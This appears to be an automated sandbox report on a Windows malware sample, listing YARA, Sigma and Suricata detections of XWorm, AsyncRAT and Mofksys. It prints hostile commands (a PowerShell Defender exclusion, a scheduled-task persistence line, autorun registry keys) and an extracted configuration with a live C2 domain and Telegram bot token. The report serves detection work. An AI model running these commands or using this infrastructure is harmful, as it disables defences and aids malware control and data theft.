11.2.shost.exe.46d420a.5.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8849:$s4: Stub.exe 0x264b0:$s4: Stub.exe 0x26528:$s4: Stub.exe 0xdce9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdd86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xde9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd343:$cnc4: POST / HTTP/1.1
24.2.svchost.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
13.2.InstallUtil.exe.370000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
13.2.InstallUtil.exe.370000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.InstallUtil.exe.370000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa649:$s4: Stub.exe 0x296b0:$s4: Stub.exe 0x29728:$s4: Stub.exe 0xfae9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfb86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfc9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf143:$cnc4: POST / HTTP/1.1
11.2.shost.exe.4540818.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
20.2.explorer.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.477b518.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.477b518.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8849:$s4: Stub.exe 0x264b0:$s4: Stub.exe 0x26528:$s4: Stub.exe 0xdce9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdd86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xde9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd343:$cnc4: POST / HTTP/1.1
11.2.shost.exe.46fdeda.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.46fdeda.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.shost.exe.46fdeda.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa649:$s4: Stub.exe 0x296b0:$s4: Stub.exe 0x29728:$s4: Stub.exe 0xfae9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfb86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfc9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf143:$cnc4: POST / HTTP/1.1
4.2.explorer.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
0.0.chiara.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.59d0000.7.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
8.0.svchost.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.4540818.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
7.0.spoolsv.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
12.2.spoolsv.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
20.0.explorer.exe.400000.0.unpack	JoeSecurity_Mofksys	Yara detected Mofksys	Joe Security
11.2.shost.exe.44287b8.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
11.2.shost.exe.46aa52a.6.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.46aa52a.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.shost.exe.46aa52a.6.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa649:$s4: Stub.exe 0x296b0:$s4: Stub.exe 0x29728:$s4: Stub.exe 0x34329:$s4: Stub.exe 0x53390:$s4: Stub.exe 0x53408:$s4: Stub.exe 0x5dff9:$s4: Stub.exe 0x7d060:$s4: Stub.exe 0x7d0d8:$s4: Stub.exe 0xfae9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x397c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x63499:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfb86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x39866:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x63536:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfc9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3997b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6364b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf143:$cnc4: POST / HTTP/1.1 0x38e23:$cnc4: POST / HTTP/1.1 0x62af3:$cnc4: POST / HTTP/1.1
11.2.shost.exe.59d0000.7.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
11.2.shost.exe.475185a.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.475185a.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.shost.exe.475185a.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa649:$s4: Stub.exe 0x296b0:$s4: Stub.exe 0x29728:$s4: Stub.exe 0x34307:$s4: Stub.exe 0x5336e:$s4: Stub.exe 0x533e6:$s4: Stub.exe 0xfae9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x397a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfb86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x39844:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfc9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x39959:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf143:$cnc4: POST / HTTP/1.1 0x38e01:$cnc4: POST / HTTP/1.1
11.2.shost.exe.46d420a.5.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.shost.exe.46d420a.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.shost.exe.46d420a.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa649:$s4: Stub.exe 0x296b0:$s4: Stub.exe 0x29728:$s4: Stub.exe 0x34319:$s4: Stub.exe 0x53380:$s4: Stub.exe 0x533f8:$s4: Stub.exe 0xfae9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x397b9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfb86:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x39856:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfc9b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3996b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf143:$cnc4: POST / HTTP/1.1 0x38e13:$cnc4: POST / HTTP/1.1
11.2.shost.exe.44287b8.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Click to see the 48 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Resources\Themes\icsys.icn.exe, ProcessId: 6764, TargetFilename: c:\windows\resources\themes\explorer.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 7744, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', ProcessId: 7976, ProcessName: powershell.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 5900, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7116, ProcessName: svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\resources\themes\explorer.exe, CommandLine: c:\windows\resources\themes\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\explorer.exe, NewProcessName: C:\Windows\Resources\Themes\explorer.exe, OriginalFileName: C:\Windows\Resources\Themes\explorer.exe, ParentCommandLine: C:\Windows\Resources\Themes\icsys.icn.exe, ParentImage: C:\Windows\Resources\Themes\icsys.icn.exe, ParentProcessId: 6764, ParentProcessName: icsys.icn.exe, ProcessCommandLine: c:\windows\resources\themes\explorer.exe, ProcessId: 6300, ProcessName: explorer.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 7744, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', ProcessId: 7976, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Windows Logon Application.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 7744, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Logon Application

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: c:\users\user\desktop\chiara.exe , CommandLine: c:\users\user\desktop\chiara.exe , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\chiara.exe , NewProcessName: C:\Users\user\Desktop\chiara.exe , OriginalFileName: C:\Users\user\Desktop\chiara.exe , ParentCommandLine: "C:\Users\user\Desktop\chiara.exe", ParentImage: C:\Users\user\Desktop\chiara.exe, ParentProcessId: 6292, ParentProcessName: chiara.exe, ProcessCommandLine: c:\users\user\desktop\chiara.exe , ProcessId: 1892, ProcessName: chiara.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 7744, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Logon Application.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 7744, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe", ProcessId: 7736, ProcessName: schtasks.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 5900, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7116, ProcessName: svchost.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\resources\themes\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\Resources\svchost.exe, ProcessId: 7116, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 7744, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe', ProcessId: 7976, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5656, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T14:25:22.875559+0200
SID:	2853685
Severity:	1
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: chiara.exe

Avira: detected

Antivirus detection for URL or domain

Source: mariona.duckdns.org

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Windows\Resources\Themes\icsys.icn.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\Resources\spoolsv.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\Resources\svchost.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\Resources\Themes\explorer.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen

Found malware configuration

Source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["mariona.duckdns.org"], "Port": "6666", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "transferdriver.exe", "Telegram URL": "https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606"}
Source: InstallUtil.exe.7744.21.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage"}

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Joe Sandbox ML: detected
Source: C:\Windows\Resources\spoolsv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\chiara.exe	Joe Sandbox ML: detected
Source: C:\Windows\Resources\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\explorer.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: chiara.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: mariona.duckdns.org
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: 6666
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: <123456789>
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: <Xwormmm>
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: Crypt
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: transferdriver.exe
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: %AppData%
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: Windows Logon Application.exe
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: 6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII
Source: 11.2.shost.exe.477b518.3.raw.unpack	String decryptor: 5702314606

Source: chiara.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49765 version: TLS 1.2

Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: Windows Logon Application.exe, 00000025.00000000.2877182211.0000000000B82000.00000002.00000001.01000000.0000001B.sdmp, Windows Logon Application.exe.21.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: chiara.exe, chiara.exe .0.dr
Source:	Binary string: InstallUtil.pdb source: Windows Logon Application.exe, 00000025.00000000.2877182211.0000000000B82000.00000002.00000001.01000000.0000001B.sdmp, Windows Logon Application.exe.21.dr

Spreading

Yara detected Mofksys

Source: Yara match	File source: chiara.exe, type: SAMPLE
Source: Yara match	File source: 12.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.chiara.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.chiara.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.2182852685.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2264439657.0000000000401000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2001681199.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2028860171.0000000000401000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2008195461.0000000000401000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2182972944.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.2195592157.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2272315679.0000000000401000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2197703621.0000000000402000.00000080.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2074461666.0000000000402000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2078868088.0000000000402000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3257810116.0000000000402000.00000080.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2077929477.0000000000402000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.2264228673.0000000000401000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2275043598.0000000000402000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.2016360803.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2270943066.00000236016E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2026328505.0000000000401000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2061337651.0000000000401000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chiara.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: icsys.icn.exe PID: 6764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: spoolsv.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: spoolsv.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7724, type: MEMORYSTR
